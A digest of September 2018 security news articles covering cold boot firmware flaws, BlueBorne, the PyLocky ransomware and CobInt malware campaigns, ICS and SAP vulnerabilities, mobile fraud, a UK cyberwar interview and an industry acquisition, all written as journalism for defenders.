“For our federal government, no amount of ‘budgetary pressures’ (or other excuse) should be tolerated when it comes to failing to have utilized a basic cybersecurity technique, such as 2FA or MFA — especially since ‘user convenience’ is not the overriding concern. The good news is that NIST’s recently updated Digital Identity Guidelines (Special Publication 800-63-3) has done much of the hard work. What’s now needed — obviously — is for our federal government agencies to use it,” Shollenbarger added. “But remember: not all MFA solutions are built the same.”

Last year, the DHS issued a Binding Operational Directive (BOD) instructing all federal agencies to start using web and email security technologies such as HTTPS, STARTTLS and DMARC.

A report published this summer by email threat protection company Agari revealed that over half of agencies had fully implemented the DMARC email security standard. However, the Department of State had only implemented DMARC on 9 of its 19 domains and was among the worst-performing agencies in this regard.


New Firmware Flaws Resurrect Cold Boot Attacks
14.9.2018 securityweek Attack

Researchers discovered that the firmware running on nearly all modern computers is vulnerable to cold boot attacks that can allow hackers to recover highly sensitive data from the device’s memory.

A cold boot attack is a side-channel attack that allows an attacker with physical access to a computer to obtain encryption keys, passwords and other data from the device’s random access memory (RAM) after a cold or hard reboot (i.e. the computer is restarted suddenly without going through the normal shutdown process). The data can remain in memory for tens of seconds or several minutes, but the time window for an attack can be extended to hours by cooling memory modules with liquid nitrogen or compressed air to slow down the degradation process.

Cold boot attacks have been known for a decade and device manufacturers have implemented mechanisms that should prevent them by overwriting the content of the memory once the system boots again.

However, researchers at Finland-based cybersecurity firm F-Secure claim to have found a way to resurrect cold boot attacks using weaknesses found in the firmware of many modern computers. Since the method requires physical access to the targeted device, the attack can be highly efficient against laptops, which can more easily be stolen.

The vulnerabilities found by researchers are said to affect devices from several major vendors, including Dell, Lenovo, and Apple. F-Secure has reported its findings to companies such as Intel, Apple and Microsoft, but says there is no easy fix.

F-Secure security consultants Olle Segerdahl and Pasi Saarinen have found a way to perform cold boot attacks by making physical changes to the device’s hardware.

Manipulating the hardware can allow an attacker to disable the feature designed to overwrite memory after a reboot, and configure the device to boot from an external device. The attacker can then perform a cold boot attack using a specially crafted USB device. The USB drive will contain software that allows the attacker to dump the content of the pre-boot memory to a file.

Cold boot attack

“It’s not exactly easy to do, but it’s not a hard enough issue to find and exploit for us to ignore the probability that some attackers have already figured this out,” Segerdahl explained. “It’s not exactly the kind of thing that attackers looking for easy targets will use. But it is the kind of thing that attackers looking for bigger phish, like a bank or large enterprise, will know how to use.”
Until permanent patches are made available, users can mitigate attacks by configuring devices to shut down or hibernate instead of sleeping when they’re not used, and, in the case of Windows computers, configure BitLocker to prompt for a PIN whenever the device starts.

Implementing these measures still allows cold boot attacks, but ensures that no valuable data is left in the memory.

After being notified by F-Secure, Microsoft updated its BitLocker countermeasures page with instructions on how attacks can be mitigated. Apple said Macs equipped with T2 chips include security mechanisms that should protect devices against cold boot attacks, and advised users of devices without the T2 chips to set a firmware password.

Experts have advised enterprises to implement an incident response plan for scenarios where their devices are lost or stolen.

“A quick response that invalidates access credentials will make stolen laptops less valuable to attackers. IT security and incident response teams should rehearse this scenario and make sure that the company’s workforce knows to notify IT immediately if a device is lost or stolen,” said Segerdahl. “Planning for these events is a better practice than assuming devices cannot be physically compromised by hackers because that’s obviously not the case.”


Talking UK Cyberwar With Sir David Omand
14.9.2018 securityweek CyberWar

Over the last few days, UK national press has run headlines such as "IT'S CYBER WAR! Prime Minister May vows to take on President Putinís novichok spy network" (Daily Mail); and "Novichok poisoning: Theresa May 'orders cyberwar' on Russia's spy network as she calls UN security meeting" (Evening Standard).

This presents a very simplistic view of Britain's attitude towards cyberwarfare; and implies a scale that almost certainly will not happen.

The background is the use of chemical weapons by the Russian GRU in the UK against Sergei Skripal, a former member of the GRU, and his daughter Yulia. Last week Alexander Petrov and Ruslan Boshirov -- believed to be aliases -- were accused of their attempted murder. Britain is not seeking extradition of the two suspects because of Russian constitutional restrictions on extraditing Russian citizens, but has issued an Interpol red notice for their arrest if they ever leave Russia. Nevertheless, it is widely felt that some form of retaliation is politically necessary -- and hence, ultimately -- the warnings on imminent cyberwar against Russia.

Talking UK Cyberwar with Professor Sir David OmandThere may well be cyber retaliation by Britain's intelligence agencies against the GRU, but it will be limited in scope and probably unattributable -- and nothing that can be classified as cyberwar. This is because the UK does not separate cyberwar from kinetic war. In May 2018, UK attorney general Jeremy Wright QC MP outlined his interpretation of international law and cyber activity. It implies that a cyber attack that resulted in actual or threatened loss of life could legally elicit a kinetic military response.

Of necessity, the UK will ensure that any cyber retaliation falls short of cyberwar that could lead to loss of life because that would invite a legal kinetic response from Russia. For the UK, cyberwar and kinetic action are both aspects of one condition: warfare.

SecurityWeek talked to Professor Sir David Omand to get a better understanding of the UK viewpoint. Sir David is a former Director of GCHQ, and former Security and Intelligence Co-ordinator in the Cabinet Office. He is visiting professor at the Department of War Studies at King's College, London.

Sir David draws a distinction between the current conditions affecting the West and Russia (which he describes as 'hostile cyber activities in peacetime'), and actual armed conflict. "No serious armed conflict in the future will be without its offensive and defensive cyber components," he told SecurityWeek. "The former to support military operations by confusing and distracting enemy commanders, degrading command, control and communications, blinding key sensors and weapons, and interfering with supply chains. The latter is essential to ensure that the adversary does not similarly degrade our capabilities with his cyber means."

The military has to be prepared for armed conflict even if it is not current and hopefully never will be current. "Offensive cyber for MOD will involve careful preparation with GCHQ in peacetime, but there will be good arguments for not disclosing the cyber components until it is really necessary to support military operations. Defensive cyber on the other hand is a constant concern for MOD to ensure the security and integrity of all defense systems in peacetime so that an adversary cannot be in a position to take advantage should it come to armed conflict. All this is not ëcyber warí; it is what we must expect serious military operations in armed conflict conditions to be like in the 21st century."

The "good arguments for not disclosing the cyber components until it is really necessary to support military operations" explains the lack of any government support for Microsoft's proposed Cyber Geneva Convention, which requires international cyber disarmament.

The implication from Sir David is that the UK is prepared for cyberwar, but it is not yet happening. Rather, he continued, "I use the acronym CESSpit: Crime, Espionage, Sabotage and Subversion perverting Internet technology. Acquisitive Crime conducted through cyber means (including traditional crimes amplified and conducted at scale through the Internet) is rising. Espionage using digital methods as well as traditional ones is ubiquitous. These are risks that just have to be managed and defended against but cannot be eliminated." It is largely, but not entirely, conducted by non-aligned cyber criminals.

"Sabotage, using cyber-attacks to damage infrastructure or the integrity of information," he continued, "comes from hostile states, non-state groups, and hackers with a grievance. These are crimes that should result in legal sanctions of some kind (as the US has done with North Korean hackers over the Sony attack). Finally, we have Subversion, the attempt to undermine our democratic institutions, and our confidence in them, as we have seen with Russian attacks on the US, French and other elections and democratic processes. Traditionally subversion is conducted by a combination of intimidation, propaganda and dirty tricks. All three components can be delivered today by digital means, more easily than with the traditional methods of the Cold War."

It is how the UK is willing to respond to this CESSpit that defines the UK attitude towards cyberwar. The first priority is to be able to defend against such attacks. "We need to organize to defend ourselves robustly with passive and active defenses against crime, espionage, sabotage and subversion, bringing together the resources of government, the private sector and academia. That is a key task for the new UK National Cyber Security Centre, part of GCHQ."

The key question here is whether -- and if so, when -- active defense can tip over into active retaliation. "There is the risk," continued Sir David, "that a hostile state or group will miscalculate where our thresholds for response are, or will imagine that their sabotage or subversive activity can be conducted unattributively leaving us unable to respond. Or, as has happened with some cyber-attacks, the malware may infect far beyond the intended target with serious damage, or loss of life as the result."

While absolute attribution of cyber activity is almost impossible by pure cyber detection, western governments have the resources of national SigInt agencies -- the Five Eyes and allied nations such as France, Germany, the Netherlands, Sweden, Israel and more. With that attributive capability comes the sting in Sir David's comments.

"No potential adversary should imagine that in those circumstances a British government might not respond in kinetic terms. But the manner and timing of such a response must be for decision in the light of the circumstances with a full range of options, cyber and military open to the government. No potential adversary should be able to game our reaction in advance or imagine the UK or its NATO allies would only think of response to cyber-attacks as necessarily being confined to the cyber dimension alone."

These conditions explain the precarious nature of UK/Russia relations right now. There has been no loss of life directly attributed to Russia -- the Skripals both recovered. A third innocent victim of Novichok has died, but this has yet to be blamed directly on Russia. But the threat to life was certainly present -- which means that the UK attitude to international law gives it the right to retaliate both kinetically and by cyber.

It will wish to avoid an armed conflict with Russia -- leaving a cyber retaliation as the primary option. But even this has to be limited in scope so as not to give Russia the same legal option of retaliating kinetically.


One Year Later, Over 2 Billion Devices Still Exposed to BlueBorne Attacks
14.9.2018 securityweek Attack

One year after researchers disclosed the Bluetooth vulnerabilities dubbed BlueBorne, more than 2 billion devices are believed to still be vulnerable to attacks, either because their owners have failed to install patches or due to the fact that no patches are available.

The BlueBorne vulnerabilities were disclosed in September 2017 by Armis Labs, a company that specializes in protecting Internet of Things (IoT) devices. Its researchers found that nine Bluetooth implementation flaws affected mobile, desktop and IoT systems, including Android, iOS, Windows and Linux devices.

Armis later also revealed that Amazon Echo and Google Home devices were also vulnerable to these attacks.

An attacker who is in range of the targeted device can exploit one of the BlueBorne flaws for remote code execution or man-in-the-middle (MitM) attacks without user interaction, simply by knowing the type of operating system used by the victim.Billions of devices still vulnerable to BlueBorne attacks

Armis, which estimated that the security holes initially impacted roughly 5.3 billion Bluetooth-enabled devices, warned that BlueBorne can be used to deliver malware – including a worm that spreads to other devices via Bluetooth – take control of phones and computers, and redirect victims to arbitrary websites.

Armis now estimates that roughly two-thirds of the 5.3 billion impacted systems received updates that should protect them against BlueBorne attacks. However, there are still over 2 billion devices that are vulnerable.

Of these, the company says roughly one billion are running a version of Android that no longer receives security updates, including Android 5.1 Lollipop and earlier (734 million), and Android 6 Marshmallow and earlier (261 million). Another 50 million devices are running iOS 9.3.5 and earlier, which have not received patches.

Armis also estimates that 200 million devices worldwide are running vulnerable versions of Windows, and 768 million devices are running an unpatched or unpatchable version of Linux. These Linux systems include servers, smartwatches, medical devices and industrial equipment.

“An inherent lack of visibility hampers most enterprise security tools today, making it impossible for organizations to know if affected devices connect to their networks,” Armis VP of Research Ben Seri wrote in a blog post. “Whether they’re brought in by employees and contractors, or by guests using enterprise networks for temporary connectivity, these devices can expose enterprises to significant risks.”

Armis pointed out that it had informed vendors about the BlueBorne vulnerabilities five months prior to making its findings public. However, many still only released patches tens and even hundreds of days after the public disclosure.

“Exploits like BlueBorne take a long time to go away,” Seri said. “This is because many of the impacted devices can’t be patched. In fact, we often have to wait until a device is retired or taken out of operation and turned off before it is no longer poses a risk. As we look across each of these platforms, Linux and Android have the longest tail, which aligns with what we are seeing in the marketplace.”

Armis noted that following the disclosure of the BlueBorne attack the cybersecurity industry once again started focusing on the threat posed by Bluetooth vulnerabilities. This led to the discovery of several potentially serious flaws affecting iOS and Android devices and even cars.

Most recently, in July, a team of researchers at the Israel Institute of Technology disclosed some Bluetooth implementation flaws that can allow an attacker in physical proximity of two targeted devices to monitor and manipulate the traffic they exchange.


Barrage of Mobile Fraud Attacks Will Increase
14.9.2018 securityweek Analysis

Mobile, as a financial fraud threat vector, is growing dramatically. Fifty-eight percent of digital transactions now originate from mobile devices, and one-third of attacks are via mobile. It is worse in the U.S., which saw a 44% increase year on year compared to a 24% global increase (perhaps partly reflecting the predicted switch from card-present to online fraud following the introduction of EMV cards in the U.S.).

The figures come from the Q2 2018 Cybercrime Report (PDF) from ThreatMetrix, based on the analysis of 17.6 billion digital transactions during the first half of 2018.

"Mobile is quickly becoming the predominant way people access online goods and services, and as a result organizations need to anticipate that the barrage of mobile attacks will only increase," said Alisdair Faulkner, Chief Identity Officer at ThreatMetrix. The primary reason is that the medium is liked by both users and vendors: identity can be tied to the phone.

For vendors, mobile transactions can be more secure than desktop transactions; while for users, mobile authentication can provide low friction authentication. The basic principle is that individual devices can be securely identified, while individual users can be tied to the device via strong authentication using built-in biometrics (commonly face, voice or fingerprint recognition).

Mastercard is spearheading the use of mobile phones for authentication with its Identity Check phone-based biometric authentication. This will only increase the use of mobile phones for financial transactions. It is, however, a double-edged sword. "Biometric data stored by a service provider is just as valuable a target for cybercriminals as a database containing usernames and passwords," warns David Emm, principal security researcher at Kaspersky Lab. His concern is that while a stolen password can be changed, a stolen biometric cannot. "Biometric data, unlike a username or password, is persistent: we carry it with us for life," he added.

"The good news," continued Faulkner, "is that as mobile usage continues to increase, so too does overall customer recognition rates, as mobile apps offer a wealth of techniques to authenticate returning customers with a very high degree of accuracy. The key point of vulnerability, however, is at the app registration and account creation stage."

This 'point of vulnerability' is likely to increase over the short term. Europe's PSD2 (the open banking directive) in particular is intended and expected to fuel growth in new fintech companies and applications. This will inevitably focus on mobile financial services; and criminals will seek to exploit any weaknesses or loopholes they can find in the new services. "The [FinServ] industry continues to perch on the precipice of reform, with European banks cautiously waiting to see how opening their APIs to third party providers (Account Information Service Providers and Payment Initiation Service Providers), will influence both fraud levels as well as customer satisfaction."

The biggest threat comes from device spoofing where fraudsters attempt to trick banks into thinking that login attempts come from new customer devices. More than 5% of all attempted transactions were recognized as such attacks. Identity spoofing is the second most significant threat, comprising 3.6% of all transactions. It was lower for finserv-specific attacks where the criminals often use stolen rather than spoofed identities. 25% of new eCommerce account applications are fraudulent, a 130% increase compared to Q2 2017.

Other common attack vectors include IP spoofing (2.2%) and man-in-the-browser or bot attacks (1.8%). The use of bots is booming, with 2.6 billion bot attacks detected in Q2 2018 -- an increase of 60% from Q1. "Bots," explains the report, "are automated scripts that attempt to gain access to accounts with stolen credentials or create fake accounts and transactions."

In the latest quarter. bot traffic has come from Vietnam, Indonesia, Russia, Malaysia and South Korea. "These bots," explains the report, "are mainly attempting to takeover good user accounts, slicing down lists of stolen identity data until they get a hit, often adjusting their rate controls to a 'low-and-slow' attack speed to mimic legitimate customer traffic."

The report notes the growth of criminal activity focused around the summer's World Cup football tournament in Russia, and the spread of financial fraud activity to emerging economies. Russian president Putin claimed that "during the World Cup almost 25 million cyberattacks and other criminal attempts on Russia's information infrastructure, connected in one way or another to the running of the football World Cup, were neutralized."

As the world becomes more connected both financially and by travel, ThreatMetrix warns "enterprises need to ensure they have dynamic, behavioral analytics-based fraud detection systems in place, which can both identify good returning customers in unusual situations (such as travelling abroad to the World Cup), as well as spotting fraudulent use of credentials which criminals try to mask by hiding in unusually high transaction volumes."

Founded in 2005, San Jose, Calif.-based ThreatMetrix's technology analyzes connections among devices, locations, identity information and threat intelligence, and combines the data with behavioral analytics to identify high-risk transactions in real time. It announced its acquisition by RELX Group in January 2018.


Bomgar to Acquire BeyondTrust
14.9.2018 securityweek IT

Atlanta-based Privileged Access Management (PAM) solutions provider Bomgar today announced a definitive agreement to acquire BeyondTrust, from an affiliate of Veritas Capital.

Both companies already have strong PAM offerings. Bomgar’s solutions secure privileged credentials, remote access sessions, and endpoints, while BeyondTrust’s extensible PAM platform helps customers scale privileged security across endpoint, server, IoT, cloud, and network device environments.

Bomgar, which was acquired by Francisco Partners earlier this year (from private equity group Thoma Bravo), announced in the beginning of August that it had completed the acquisition of Massachusetts-based endpoint privilege management company Avecto.

Based in Phoenix, BeyondTrust was acquired by Veritas Capital in 2014 for an undisclosed price. The company says it has a global partner network that serves more than 4,000 enterprises.

The combined company, which will retain the BeyondTrust brand, should provide a comprehensive PAM portfolio to their more than 19,000 customers worldwide. Combined, Bomgar and BeyondTrust have over 800 employees across 14 countries.

The combined company will be led by Matt Dircks, CEO of Bomgar, and will be headquartered in Atlanta, GA.

“The greater scale and resources of the combined company will allow us to accelerate innovation and deliver technology that protects our customers from constantly evolving threats,” Dircks said.

The transaction is expected to close in October. The terms of the deal were not disclosed.

Additional details on the integration and on the resulting products will be provided in the coming weeks or months.


Flaws in firmware expose almost any modern PC to Cold Boot Attacks
14.9.2018 securityaffairs Attack

New Firmware Flaws Resurrect Cold Boot Attacks
A team of security researchers demonstrated that the firmware running on nearly all modern computers is vulnerable to cold boot attacks.
A team of experts from cybersecurity firm F-Secure has discovered security flaws affecting firmware in modern computers that could be exploited by hackers to carry out cold boot attacks and recover sensitive data from the memory of the affected machines.

The attack devised by Olle Segerdahl and Pasi Saarinen leverages physical changes to the target hardware.

A cold boot attack is a type of side channel attack that allows an attacker with physical access to the target system to retrieve sensitive data (i.e. encryption keys, passwords) from a running operating system after using a cold reboot to restart the machine.

“Cold boot attacks are a known method of obtaining encryption keys from devices. But the reality is that attackers can get their hands on all kinds of information using these attacks. Passwords, credentials to corporate networks, and any data stored on the machine are at risk,” reads the blog post published by the experts.

Cold Boot Attacks

The attack is possible because the data can remain in memory for a variable time and an attacker can retrieve them by accessing the memory after a cold reboot. The permanence of data in memory could be extended up to hours by cooling memory modules.

Experts from F-Secure discovered vulnerabilities affecting computers from several major vendors, including Dell, Lenovo, and Apple.

The bad news is that it is impossible to fix such flaws in the affected machines.

The experts at F-Secure demonstrated that hardware changes could be exploited by an attacker to disable the feature that overwrites memory after a reboot, and configure the computer to boot from an external device.

“The two experts figured out a way to disable this overwrite feature by physically manipulating the computer’s hardware.” continues the blog post.

“Using a simple tool, Olle and Pasi learned how to rewrite the non-volatile memory chip that contains these settings, disable memory overwriting, and enable booting from external devices. Cold boot attacks can then be carried out by booting a special program off a USB stick.”

The experts demonstrated that it is possible to carry out the attack using a specially crafted USB device that contains the code to dump the content of the pre-boot memory to a file.

The security duo speculates that the attack can be effective against nearly all modern laptops.

“It’s not exactly easy to do, but it’s not a hard enough issue to find and exploit for us to ignore the probability that some attackers have already figured this out,” Segerdahl explained. “It’s not exactly the kind of thing that attackers looking for easy targets will use. But it is the kind of thing that attackers looking for bigger phish, like a bank or large enterprise, will know how to use.”

A possible mitigation consists of configuring devices to shut down or hibernate instead of sleeping when they’re not used. Windows users have to configure BitLocker that asks for a PIN whenever the computers power up.

Even implementing these measures, an attacker could still perform a cold boot attack but cannot access encryption keys because they aren’t stored in the RAM when a machine hibernates or shuts down. This means that here’s no valuable info for an attacker to access.

“A quick response that invalidates access credentials will make stolen laptops less valuable to attackers. IT security and incident response teams should rehearse this scenario and make sure that the company’s workforce knows to notify IT immediately if a device is lost or stolen,” said Segerdahl. “Planning for these events is a better practice than assuming devices cannot be physically compromised by hackers because that’s obviously not the case.” concludes the experts.


ICS CERT warns of several flaws Fuji Electric Fuji Electric V-Server
13.9.2018 securityaffairs ICS 
Vulnerebility

Experts discovered several flaws in Fuji Electric V-Server, a tool that connects PCs within the organizations to Industrial Control Systems (ICS).
Experts discovered several vulnerabilities in Fuji Electric V-Server, a tool that connects PCs within the organizations to Industrial Control Systems (ICS) on the corporate network. The ICS-CERT published two advisories to warn of the existence of the flaws that could have a severe impact on a broad range of companies in the critical manufacturing sector.

Fuji Electric V server

The vulnerabilities rated as “high severity” could be exploited by a remote attacker to execute arbitrary code, The kind of issues affecting products that control ICS systems are very dangerous and pose a severe threat to the companies, their security is essential to avoid ugly surprises.

Vulnerabilities affecting products that connect the corporate network to industrial control systems (ICS) can pose a serious threat since that is how many threat actors attempt to make their way onto sensitive systems.

Fuji Electric V-Server devices access to programmable logic controllers (PLCs) on the corporate network via Ethernet. The control of the PLCs is implemented via the Monitouch human-machine interfaces (HMI).

Fuji Electric V server

“Successful exploitation of these vulnerabilities could allow for remote code execution on the device, causing a denial of service condition or information exposure.” reads the advisory published by the ICS CERT.

The list of vulnerabilities includes use-after-free, untrusted pointer dereference, heap-based buffer overflow, out-of-bounds write, integer underflow, out-of-bounds read, and stack-based buffer overflow vulnerabilities that could be exploited by remote attackers to execute arbitrary code and trigger denial-of-service (DoS) condition or information disclosure.

The bad news is that public exploits for some flaws are already available online.

The ICS-CERT also warns of another high severity buffer overflow in V-Server Lite that can lead to a DoS condition or information leakage. The flaw could be triggered by tricking victims into opening specially crafted project files.

The vendor addressed the issues with the release of version 4.0.4.0.

The flaws were reported to the vendor via Trend Micro’s Zero Day Initiative (ZDI) by researchers Steven Seeley from Source Incite and Ariele Caltabiano.

ZDI rated the flaws as “medium severity” with a CVSS score of 6.8, while the most severe issue was the one found by Caltabiano.

“This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of Fuji Electric V-Server. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file.” states the advisory from ZDI.

“The specific flaw exists within the parsing of a VPR file. The issue results from the lack of proper validation of user-supplied data, which can result in an integer underflow before writing to memory. An attacker can leverage this vulnerability to execute code under the context of the V-Server process.”


September 2018 Security Notes address a total of 14 flaws in SAP products
13.9.2018 securityaffairs
Vulnerebility

SAP today just released the September 2018 set of Security Notes that address a total of 14 flaws in its products, including a critical flaw in SAP Business Client.
The September 2018 Security Patch Day includes other 13 Security Notes, three were rated High severity, 9 Medium risk, and 1 Low severity. SAP also released 8 Support Package Notes,

The critical vulnerability in SAP Business Client addressed by SAP was rated as Hot News and received a CVSS score of 9.8. The issue affects the browser control Chromium delivered with SAP Business Client. The vulnerability was first addressed by the company on April 2018 Patch Day, but the Security Note was updated with the last security updates.

Other SAP products addressed with the Security Notes are Business One, BEx Web Java Runtime Export Web Service, HANA, WebDynpro, NetWeaver AS Java, Hybris Commerce, Plant Connectivity, Adaptive Server Enterprise, HCM Fiori “People Profile” (GBX01HR), Mobile Platform, Enterprise Financial Services, and Business One Android application.

“SAP has released the monthly critical patch update for September 2018. This patch update closes 22 SAP Security Notes (14 SAP Security Patch Day Notes and 8 Support Package Notes). 3 of all the patches are updates to the previously released Security Notes.” reads a blog post published by security firm ERPScan.

“4 notes are released after the second Tuesday of the previous month and before the second Tuesday of this month.”

sap security notes sept 2018

Most of the vulnerabilities are Missing Authorization Check, followed by information disclosure, Cross-Site Scripting, and XML External Entity issues.

The most severe flaws in SAP Security Notes are:

2670284: SAP Business One and SAP HANA Installer has an Information Disclosure vulnerability (CVSS Base Score: 8.8 CVE-2018-2458).
2644279: SAP BEx Web Java Runtime Export Web Service has a Missing XML Validation (XXE) vulnerability (CVSS Base Score: 8.8 CVE-2018-2462).
2681207: DOS vulnerability in SAP HANA, Extended Application Services classic model
Product – SAP HANA; Versions – 1.0, 2.0 (CVE-2018-2465)
The 2681207 was discovered by Martin Doyhenard, a researcher at the Onapsis.

“The attack can be carried out by an attacker by sending a large crafted request to a default API or ODATA services present in a HANA XS system abusing the XML parsing failure of one of the libraries which are used by xsengine to parse XML data strings. The malicious request can be remote and unauthenticated, that is, it does not need to be local or come from an authenticated user and no user credentials are needed.” reads the analysis published by Onapsis.


New PyLocky Ransomware stands out for anti-machine learning capability
13.9.2018 securityaffairs
Ransomware

Security experts from Trend Micro have spotted a new strain of ransomware involved in attacks in July and August, the malicious code was posing as the Locky ransomware.
Researchers at Trend Micro have detected a new ransomware family, dubbed PyLocky, that was used in attacks between July and August, the malware was posing as the Locky ransomware using its ransom note.

PyLocky is written in Python and it is packaged with the PyInstaller tool that is normally used to freeze Python programs into stand-alone executables.

PyLocky stands out for its anti-machine learning capability, it also leverages the open-source script-based Inno Setup Installer.

“In late July and throughout August, we observed waves of spam email delivering the PyLocky ransomware. Although it tries to pass off as Locky in its ransom note, PyLocky is unrelated to Locky.” reads hte analysis published by Trend Micro.

“PyLocky is written in Python, a popular scripting language; and packaged with PyInstaller, a tool used to package Python-based programs as standalone executables.”

Experts warn of its ability to bypass static analysis methods due to the combined use of Inno Setup Installer and PyInstaller.

The PyLocky malware was distributed via spam emails most of which targeted European countries, particularly France.

Experts pointed out the spam campaign started low in volume, but the overall number of spam messages increased in time.

The infections chain sees spam messages distributing PyLocky to recipients luring them with socially engineered subjects. The emails include a link that redirects users to a malicious URL containing the PyLocky components.

“The malicious URL leads to a ZIP file (Facture_23100.31.07.2018.zip) that contains a signed executable (Facture_23100.31.07.2018.exe). When successfully run, the Facture_23100.31.07.2018.exe will drop malware components — several C++ and Python libraries and the Python 2.7 Core dynamic-link library (DLL) — along with the main ransomware executable (lockyfud.exe, which was created via PyInstaller ) in C:\Users\{user}\AppData\Local\Temp\is-{random}.tmp.” states the report.

pylocky ransomware

Once infected a system, PyLocky ransomware attempts to encrypt image, video, document, sound, program, game, database, and archive files, among others.

“PyLocky is configured to encrypt a hardcoded list of file extensions, as shown in Figure 4. PyLocky also abuses Windows Management Instrumentation (WMI) to check the properties of the affected system. ” continues the report.

To avoid analysis tools, such as sandboxes, the maòicious code sleeps for 999,999 seconds, roughly around 11.5 days, if the total visible memory of the infected system is less than 4GB.

The encryption routines are implemented using the PyCrypto library and leverage the 3DES (Triple DES) cipher. PyLocky enumerated logical drives of the hot and generates a list of files that it uses to overwrites each file in the list with an encrypted version.

At the end of the process, the ransomware drops a ransom note that could be in English, French, Korean, or Italian, a circumstance that suggests possible targets of the operators behind the threat.

PyLocky also sends to the command and control (C&C) server information about the infected system.

“PyLocky’s evasion techniques and abuse of legitimate tools typically reserved to administrators further exemplify the significance of defence in depth. For instance, machine learning is a valuable cybersecurity tool in detecting unique malware, but it is not a silver bullet. With today’s threats, there are different vectors at the attackers’ disposal, which makes a multi-layered approach to security important,” Trend Micro concludes.


Cobalt crime gang is using again CobInt malware in attacks on former soviet states
13.9.2018 securityaffairs CyberCrime

The Russian Cobalt crime gang was particularly active in the last month, a new report confirms a massive use of the CobInt malware in recent attacks.
Security researchers from Proofpoint reported the massive use of the CobInt malware by the Cobalt group in recent attacks. The Cobalt name is based on the association of the malware with the “Cobalt Group” and an internal DLL name of “int.dll” used in some of the samples detected by the experts.

On August 13, 2018, security experts from Netscout’s ASERT, uncovered a new campaign carried out by the Cobalt crime gang. The hackers targeted also the NS Bank in Russia and Carpatica/Patria in Romania.

Cobalt crime gang has been active since at least 2016, it targeted banks worldwide, the group leveraged spear-phishing emails to compromise target systems, spoofed emails from financial institutions or a financial supplier/partner.

The attackers exploited several vulnerabilities in Microsoft Office, including CVE-2017-8570, CVE-2017-11882, and CVE-2018-0802.

The group also targeted entities in other sectors, including Government agencies, Telco, Internet service providers, manufacturing, entertainment, and companies in the healthcare industry.

Early this year the hacker group used the malware as a first-stage downloader, but in later attacks, the crew did not use it anymore. CobInt is a multi-stage CobInt malware dropped by the group via malicious Office documents that were created using the ThreadKit builder kit.

The Cobalt crime gang used again the CobInt backdoor in many attacks since July, including the attacks aimed at the Russian and Romanian banks.

In August, Proofpoint experts observed at least four campaigns of the group leveraging the CobInt malware.

“We have also observed an actor commonly known as Cobalt Gang (or Group) using another new downloader that shares many of these characteristics since early 2018. Group-IB named this malware “CobInt” and released a report on its use by Cobalt Gang in May [3]. While we noticed that Cobalt Gang appeared to stop using CobInt as a first-stage downloader around the time researchers at Group-IB published their findings, they have since returned to using the downloader as of July.” reads the analysis published by Proofpoint.

Below the list of the attacks carried out by the Cobalt crime gang in the last weeks:

Date Description CVV
August 2, 2018 Attacker used messages with the subject “Подозрение на мошенничество” (Translated from Russian: “Suspicion of fraud”) purporting to be from “Interkassa” using a sender email address with a lookalike domain “denis[@]inter-kassa[.]com”.
August 14, 2018, Attackers used messages spoofing the Single Euro Payments Area (SEPA) with lookalike sender domains sepa-europa[.]com or sepa-europa[.]info and subjects such as “notification”, “letter”, “message”, and “notice”. The messages (Figure 1) contained: CVE-2017-8570, CVE-2017-11882, or CVE-2018-0802
August 16, 2018, Attackers used messages purporting to be from Alfa Bank using a lookalike domain aifabank[.]com and subjects such as “Fraud Control”, “Фрауд” (Translates to “Fraud”), “Предотвращение хищения” (Translates to “Prevention of theft“), and “Блокирование транзакций” (Translates to “Transaction Blocking”). CVE-2017-8570, CVE-2017-11882, or CVE-2018-0802
September 4, 2018 Attackers used messages purporting to be from Raiffeisen Bank using lookalike sender domains ralffeisen[.]com and subjects such as “Fraudulent transaction”, “Wire Transfer Fraud”, and “Request for data”. CVE-2018-8174

Cobalt crime Gang.png

Malware analysis reveals that the CobInt is a downloader written in C that can be broken up into three stages: an initial downloader for the core component, the core component, and several additional modules.

The first stage downloader disguises its activity by the use of Windows API function hashing and downloads the second stage via HTTPS.

The main component downloads and executes various modules from its C&C. C&C hosts are stored in a 64-byte chunk of encrypted data that can be decrypted by XORing with a 64-byte XOR key.

The malware supports the following commands:

load/execute module;
stop polling C&C;
execute function set by module;
update C&C polling wait time.
These, Proofpoint notes, are reconnaissance steps that the attackers are likely to follow with the deployment of additional modules to the compromised systems of interest.

“CobInt provides additional evidence that threat actors — from newer players we featured in our AdvisorsBot blog to established actors like TA505 and Cobalt Group– are increasingly looking to stealthy downloaders to initially infect systems and then only install additional malware on systems of interest.” Proofpoint concludes.

“As defenses improve across the board, threat actors must innovate to improve the returns on their investments in malware and infection vectors, making this approach consistent with the “follow the money” theme we have associated with a range of financially motivated campaigns over the years. This appears to be the latest trend as threat actors look to increase their effectiveness and differentiate final payloads based on user profiles”

Further details, including IoCs are reported in the analysis published by Proofpoint.


Address Bar Spoofing Flaw Found in Edge, Safari
12.9.2018 securityweek
Vulnerebility

A researcher has discovered an address bar spoofing vulnerability in the Microsoft Edge and Apple Safari web browsers, but a patch is currently only available for the former.

Pakistan-based security researcher Rafay Baloch has identified several SOP bypass and address bar spoofing flaws in the past years. This week, he reported finding another spoofing bug that affects Safari on iOS and Edge.

“During my testing, it was observed that both Edge and Safari browsers allowed JavaScript to update the address bar while the page was still loading,” Baloch explained in a blog post. “Upon requesting data from a non-existent port the address was preserved and hence due to a race condition over a resource requested from a non-existent port combined with the delay induced by setInterval function managed to trigger address bar spoofing. It causes the browser to preserve the address bar and to load the content from the spoofed page. The browser will eventually load the resource, however the delay induced with the setInterval function would be enough to trigger the address bar spoofing.”

Both Microsoft and Apple were notified about the vulnerability in early June. Microsoft, which tracks the flaw as CVE-2018-8383, fixed the issue with its Patch Tuesday updates for August 2018.

“A spoofing vulnerability exists when Microsoft Edge does not properly parse HTTP content. An attacker who successfully exploited this vulnerability could trick a user by redirecting the user to a specially crafted website. The specially crafted website could either spoof content or serve as a pivot to chain an attack with other vulnerabilities in web services,” Microsoft said in its advisory.

Microsoft has classified the flaw as “important,” but assigned it an “Exploitation More Likely” rating in its exploitability assessment. The company has credited Baloch and several others for reporting this flaw.

In the case of Safari for iOS, Baloch said the browser does not allow users to type information into input boxes while the page is still loading – this would normally prevent the spoofing attack – but the restriction can be bypassed by injecting a keyboard into the fake page.

Apple has yet to release a patch. The company was given 90 days to address the issue before its existence was made public, but it did promise to include a fix in an upcoming update of the browser.

